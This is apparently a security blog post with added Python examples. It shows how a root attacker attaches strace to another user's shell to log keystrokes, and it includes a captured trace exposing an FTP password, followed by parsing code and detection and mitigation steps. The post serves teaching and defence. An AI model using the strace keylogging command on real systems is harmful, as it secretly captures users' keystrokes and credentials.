Friday, April 18, 2014

The Poor Man’s Keylogger – strace

The strace tool is commonly used for debugging applications in Linux: it traces the system calls a process makes and the signals it receives. Because it is more than likely already installed as part of your OS, we will look at how an attacker can turn a tool that is already there to their advantage.
Assumption: the attacker already has a shell (root, in this example) on the machine we are using.

For this example, we will perform the following:
1. Initiate strace and attach it to a specific PID
2. Capture all keystrokes from this PID and any child process it forks (creates)
3. Store this information to a file for offline analysis

Let’s begin!

Let’s see what shells we currently have available
root@securitynik:~# ps aux | grep bash
root      3103  0.0  0.6   6140  3392 pts/0    Ss+  17:14   0:00 bash
root      3199  0.0  0.6   6140  3540 pts/1    Ss   17:18   0:00 bash
root      3373  0.0  0.1   3488   768 pts/1    S+   18:06   0:00 grep bash

Hmmm. Let’s see which one belongs to us
root@securitynik:~# tty
/dev/pts/1

Looks like we are currently using /dev/pts/1. Guess that means /dev/pts/0 is the one we should hook into. Let’s do that.

Let’s start strace and send it to the background
root@securitynik:~# strace -p 3103 -t -e write -q -f -o keylogger.txt &
[1] 3432

Above we are telling strace to do the following:
1. -p 3103: attach to PID 3103, which above is the bash on pts/0
2. -t: print the time of day with each call
3. -e write: only capture write calls
4. -q: be quiet (suppress the attach/detach messages)
5. -f: follow any forked (child) process
6. -o keylogger.txt: write the results to a file named keylogger.txt

Using the console with PID 3103, let’s run a few commands and connect to a remote system running FTP:
root@securitynik:~# id
uid=0(root) gid=0(root) groups=0(root)
root@securitynik:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash

root@securitynik:~# ftp 192.168.0.50
Connected to 192.168.0.50.
220 Microsoft FTP Service
Name (192.168.0.50:root): administrator
331 Password required for administrator.
Password:
230-Welcome to securitynik FTP Server :-D
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> exit
221 Do return soon :-)

So the above commands were run, but what did we capture?
Let’s find out. The file is truncated here for brevity.
root@securitynik:~# cat keylogger.txt | more
-------- results from the ID command ---------
    
3103  18:20:51 write(2, "i", 1)         = 1
3103  18:20:51 write(2, "d", 1)         = 1
3103  18:20:52 write(2, "\n", 1)        = 1
3449  18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39

--------- results from cat /etc/passwd
3103  18:20:57 write(2, "c", 1)         = 1
3103  18:20:57 write(2, "a", 1)         = 1
3103  18:20:57 write(2, "t", 1)         = 1
3103  18:20:57 write(2, " ", 1)         = 1
3103  18:20:58 write(2, "/", 1)         = 1
3103  18:20:58 write(2, "e", 1)         = 1
3103  18:20:58 write(2, "t", 1)         = 1
……..
3103  18:20:59 write(3, "/etc", 4)      = 4
3103  18:20:59 write(3, "\n", 1)        = 1
3103  18:20:59 write(2, "c/", 2)        = 2
3103  18:21:01 write(2, "p", 1)         = 1
3103  18:21:01 write(2, "a", 1)         = 1
3103  18:21:01 write(2, "s", 1)         = 1
3103  18:21:01 write(2, "s", 1)         = 1
3103  18:21:01 write(2, "w", 1)         = 1
3103  18:21:02 write(2, "d", 1)         = 1
3103  18:21:02 write(2, "\n", 1)        = 1
3468  18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2279) = 2279

---------- and last but not least the results from the FTP session --------
103  18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103  18:21:17 write(2, "f", 1)         = 1
3103  18:21:18 write(2, "t", 1)         = 1
3103  18:21:18 write(2, "p", 1)         = 1
…..
3103  18:21:24 write(2, "1", 1)         = 1
3103  18:21:24 write(2, "9", 1)         = 1
3103  18:21:24 write(2, "2", 1)         = 1
3103  18:21:24 write(2, ".", 1)         = 1
3103  18:21:25 write(2, "1", 1)         = 1
3103  18:21:25 write(2, "6", 1)         = 1
3103  18:21:25 write(2, "8", 1)         = 1
3103  18:21:26 write(2, ".", 1)         = 1
3103  18:21:26 write(2, "0", 1)         =
3103  18:21:26 write(2, ".", 1)         = 1
3103  18:21:26 write(2, "5", 1)         = 1
3103  18:21:26 write(2, "0", 1)         = 1
3103  18:21:27 write(2, "\n", 1)        = 1
3470  18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470  18:21:27 write(1, "220 Microsoft FTP Service\n", 26) = 26
3470  18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26
3470  18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470  18:21:31 write(1, "331 Password required for admini"..., 41) = 41
3470  18:21:31 write(6, "Password:", 9) = 9
3470  18:21:35 write(6, "\n", 1)        = 1
3470  18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470  18:21:35 write(1, "230-Welcome to securitynik FTP S"..., 42) = 42
3470  18:21:35 write(1, "230 User administrator logged in"..., 34) = 34
3470  18:21:35 write(5, "SYST\r\n", 6)  = 6
3470  18:21:35 write(1, "Remote system type is Windows_NT"..., 34) = 34
3470  18:21:35 write(1, "ftp> ", 5)     = 5
3470  18:21:38 write(1, "d", 1)         = 1
3470  18:21:39 write(1, "i", 1)         = 1
3470  18:21:39 write(1, "r", 1)         = 1
3470  18:21:39 write(1, "\n", 1)        = 1
3470  18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470  18:21:39 write(1, "200 PORT command successful.\n", 29) = 29
3470  18:21:39 write(5, "LIST\r\n", 6)  = 6
3470  18:21:39 write(1, "150 Opening ASCII mode data conn"..., 52) = 52
3470  18:21:39 write(1, "226 Transfer complete.\n", 23) = 23
3470  18:21:39 write(1, "ftp> ", 5)     = 5
3470  18:21:43 write(1, "e", 1)         = 1
3470  18:21:43 write(1, "x", 1)         = 1
3470  18:21:44 write(1, "i", 1)         = 1
3470  18:21:44 write(1, "t", 1)         = 1
3470  18:21:44 write(1, "\n", 1)        = 1
3470  18:21:44 write(5, "QUIT\r\n", 6)  = 6
3470  18:21:44 write(1, "221 Do return soon :-) \n", 24) = 24
3103  18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
3103  18:21:44 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
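To see at a glance what a trace like the one above exposes, here is an added example (not part of the original post) that parses strace -f -t -e write output, rebuilds the typed command lines from the terminal keystroke echo, and lists the plaintext FTP USER/PASS commands written to the control socket. This is the triage an incident responder does on a recovered keylogger.txt to learn which commands and credentials were exposed. The trace it runs on is constructed inside the block, modelled on the output above with simplified timestamps; the reconstruction rule (one- or two-byte writes to fd 1 or 2 are echo, longer writes are program output) is a heuristic of this example, not something the post states.

```python
import re
from dataclasses import dataclass

# Decode the C-style escapes strace prints inside quoted write() buffers (\n, \r, \33, \7, \", \\ ...).
_ESC = re.compile(r'\\(x[0-9a-fA-F]{2}|[0-7]{1,3}|.)')
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'a': '\a', 'b': '\b', 'f': '\f', 'v': '\v'}


def unescape(raw):
    def repl(m):
        e = m.group(1)
        if e[0] == 'x':
            return chr(int(e[1:], 16))
        if e[0] in '01234567':
            return chr(int(e, 8))
        return _SIMPLE.get(e, e)   # \" and \\ fall through to the literal character
    return _ESC.sub(repl, raw)


# One 'PID  HH:MM:SS write(fd, "buf"[...], len) = ret' line as produced by strace -f -t -e write.
_LINE = re.compile(
    r'^(?P<pid>\d+)\s+(?P<time>\d{2}:\d{2}:\d{2})\s+write\((?P<fd>\d+),\s*'
    r'"(?P<data>(?:[^"\\]|\\.)*)"(?P<trunc>\.\.\.)?,\s*(?P<len>\d+)\)\s*=\s*(?P<ret>-?\d+)?')


@dataclass
class WriteEvent:
    pid: int
    time: str
    fd: int
    data: str        # decoded buffer, possibly cut short by strace's default 32-byte string limit
    length: int      # byte count the process actually passed to write()
    truncated: bool  # True when strace printed "..." after the buffer


def parse_trace(text):
    """Parse strace output into WriteEvents; signal lines and '.....' elisions are skipped."""
    events = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            events.append(WriteEvent(int(m['pid']), m['time'], int(m['fd']),
                                     unescape(m['data']), int(m['len']), bool(m['trunc'])))
    return events


def typed_lines(events, max_echo=2):
    """Rebuild what was typed at each traced process's terminal (heuristic of this example).

    Readline/canonical tty echo shows up as tiny writes to stdout/stderr (bash uses fd 2,
    ftp fd 1); prompts and program output are much longer writes. Tab completion echoes a
    couple of characters at once, hence max_echo=2. Writes to other fds (files, sockets,
    /dev/tty used by getpass) are never echo, so a password read by getpass is not here.
    """
    partial, lines = {}, []
    for ev in events:
        if ev.fd not in (1, 2) or ev.length > max_echo or ev.data.startswith('\x1b'):
            continue
        partial.setdefault(ev.pid, []).append(ev.data)
        if ev.data.endswith('\n'):
            lines.append((ev.pid, ev.time, ''.join(partial.pop(ev.pid)).rstrip('\n')))
    return lines


def credential_writes(events):
    """Plaintext FTP USER/PASS commands written to non-terminal fds (the control socket)."""
    return [(ev.pid, ev.time, ev.fd, ev.data.rstrip('\r\n'))
            for ev in events
            if ev.fd >= 3 and ev.data.upper().startswith(('USER ', 'PASS '))]


# --- constructed sample, modelled on the post's keylogger.txt with simplified timestamps ---
def _c_escape(ch):
    return {'\\': '\\\\', '\n': '\\n', '"': '\\"'}.get(ch, ch)


def _echo(pid, t, fd, text):
    """One strace line per echoed character, as the keystroke echo appears in the trace."""
    return [f'{pid}  {t} write({fd}, "{_c_escape(ch)}", 1) = 1' for ch in text]


SAMPLE_TRACE = '\n'.join(
    _echo(3103, '18:20:51', 2, 'id\n') +
    ['3449  18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39'] +
    _echo(3103, '18:20:57', 2, 'cat /et') +
    ['3103  18:20:59 write(3, "/etc", 4)      = 4',        # bash tab completion, not echo
     '3103  18:20:59 write(2, "c/", 2)        = 2'] +      # the completed text echoed back
    _echo(3103, '18:21:01', 2, 'passwd\n') +
    ['3468  18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\\n"..., 2279) = 2279',
     '3103  18:21:02 write(2, "\\33]0;root@securitynik: ~\\7\\33[01;31m"..., 70) = 70'] +
    _echo(3103, '18:21:17', 2, 'ftp 192.168.0.50\n') +
    ['3470  18:21:27 write(1, "Connected to 192.168.0.50.\\n", 27) = 27',
     '3470  18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26',
     '3470  18:21:31 write(5, "USER administrator\\r\\n", 20) = 20',
     '3470  18:21:31 write(6, "Password:", 9) = 9',          # fd 6 is /dev/tty, no echo
     '3470  18:21:35 write(6, "\\n", 1)        = 1',
     '3470  18:21:35 write(5, "PASS Testing1\\r\\n", 15) = 15',
     '3470  18:21:35 write(1, "ftp> ", 5)     = 5'] +
    _echo(3470, '18:21:38', 1, 'dir\n') +
    ['3470  18:21:39 write(5, "LIST\\r\\n", 6)  = 6',
     '3470  18:21:39 write(1, "ftp> ", 5)     = 5'] +
    _echo(3470, '18:21:43', 1, 'exit\n') +
    ['3470  18:21:44 write(5, "QUIT\\r\\n", 6)  = 6',
     '3103  18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---'])


def summarize(text):
    events = parse_trace(text)
    return {'events': len(events), 'typed': typed_lines(events),
            'credentials': credential_writes(events)}


if __name__ == '__main__':
    for key, value in summarize(SAMPLE_TRACE).items():
        print(key, value)
```

Two things the summary makes obvious that the raw file hides: the FTP password never appears in the keystroke echo (getpass writes to /dev/tty and does not echo), yet it is still in the log because the client writes PASS in clear over the control socket, and the -s 32 default means long writes such as the /etc/passwd dump are truncated, so what the attacker saw of command output is only partly recoverable from this file.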

As can be seen, the tools on our systems can easily be used for bad just as they can for good.

How to mitigate this?
Be aware of what processes you expect to see on your systems.
If you don’t use strace for debugging and still see it in your “ps aux” output, then you need to investigate why it is there.

root@securitynik:~# ps aux | grep strace
root      3432  0.0  0.1   2088   644 pts/1    S    18:15   0:00 strace -p 3103 -t -e write -q -f -o keylogger.txt

Further checks
root@securitynik:~# lsof | grep strace
strace    3432            root  cwd       DIR        8,1     4096     785892 /root
strace    3432            root  rtd       DIR        8,1     4096          2 /
strace    3432            root  txt       REG        8,1   207880     785911 /usr/bin/strace
strace    3432            root  mem       REG        8,1  1441960     655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace    3432            root  mem       REG        8,1   117960     679406 /lib/i386-linux-gnu/ld-2.13.so
strace    3432            root    0u      CHR      136,1      0t0          4 /dev/pts/1
strace    3432            root    1u      CHR      136,1      0t0          4 /dev/pts/1
strace    3432            root    2u      CHR      136,1      0t0          4 /dev/pts/1
strace    3432            root    3w      REG        8,1     4782     800789 /root/keylogger.txt
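Grepping ps for the name strace only works while the binary keeps its name. The kernel records the attachment itself: every process's /proc/<pid>/status carries a TracerPid field that is non-zero whenever something is ptrace-attached to it, which is exactly what strace -p does. The following added example (not from the post) scans those status files, reports each traced process together with its tracer, and lists the regular files the tracer holds open for writing, which is how the /root/keylogger.txt seen in the lsof output above would show up. The sample statuses in the block are constructed, modelled on the PIDs in the post; the fdinfo flags check assumes the standard Linux layout where the low two bits of the open flags hold the access mode.

```python
import os


def parse_status(text):
    """Turn the 'Key:\tvalue' lines of /proc/<pid>/status (or fdinfo) into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(':')
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def tracer_of(status_text):
    """PID of the process ptrace-attached to this one, or 0 if nobody is tracing it."""
    return int(parse_status(status_text).get('TracerPid', '0') or 0)


def find_traced(statuses):
    """statuses maps pid -> contents of its status file; returns one record per traced process."""
    parsed = {pid: parse_status(text) for pid, text in statuses.items()}
    findings = []
    for pid in sorted(parsed):
        tracer = int(parsed[pid].get('TracerPid', '0') or 0)
        if tracer == 0:
            continue
        findings.append({
            'pid': pid,
            'name': parsed[pid].get('Name', '?'),
            'tracer_pid': tracer,
            'tracer_name': parsed.get(tracer, {}).get('Name', '<not in snapshot>'),
        })
    return findings


def read_live_statuses(proc_root='/proc'):
    """Snapshot every readable /proc/<pid>/status on this host (empty dict off Linux)."""
    statuses = {}
    if not os.path.isdir(proc_root):
        return statuses
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, 'status')) as fh:
                statuses[int(entry)] = fh.read()
        except OSError:   # the process exited mid-scan, or we lack permission
            continue
    return statuses


def tracer_output_files(tracer_pid, proc_root='/proc'):
    """Regular files the tracer holds open for writing: where an 'strace -o' log is going."""
    found = []
    fd_dir = os.path.join(proc_root, str(tracer_pid), 'fd')
    try:
        fds = os.listdir(fd_dir)
    except OSError:
        return found
    for fd in fds:
        link = os.path.join(fd_dir, fd)
        try:
            target = os.readlink(link)
            with open(os.path.join(proc_root, str(tracer_pid), 'fdinfo', fd)) as fh:
                flags = int(parse_status(fh.read()).get('flags', '0'), 8)
        except (OSError, ValueError):
            continue
        # O_WRONLY == 1, O_RDWR == 2 live in the low two bits; isfile() follows the magic
        # symlink, so ttys such as /dev/pts/1 (character devices) are excluded.
        if os.path.isfile(link) and (flags & 0o3) in (1, 2):
            found.append((int(fd), target))
    return found


# Constructed sample modelled on the post: strace (3432) attached to the bash on pts/0 (3103),
# while the bash on pts/1 (3199) is untouched.
SAMPLE_STATUSES = {
    3103: 'Name:\tbash\nState:\tS (sleeping)\nPid:\t3103\nTracerPid:\t3432\n',
    3199: 'Name:\tbash\nState:\tS (sleeping)\nPid:\t3199\nTracerPid:\t0\n',
    3432: 'Name:\tstrace\nState:\tS (sleeping)\nPid:\t3432\nTracerPid:\t0\n',
}


if __name__ == '__main__':
    print('sample:', find_traced(SAMPLE_STATUSES))
    for rec in find_traced(read_live_statuses()):
        print('live:', rec, 'writing to', tracer_output_files(rec['tracer_pid']))
```

A non-zero TracerPid is not proof of malice on its own: gdb, ltrace and a developer's own strace session set it too, so treat it as a lead to correlate with who owns the tracer and what it writes. Note also that the attacker in the post is root; the kernel.yama.ptrace_scope sysctl, where available, restricts which processes an unprivileged user may attach to, but it does not stop a tracer that holds CAP_SYS_PTRACE.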

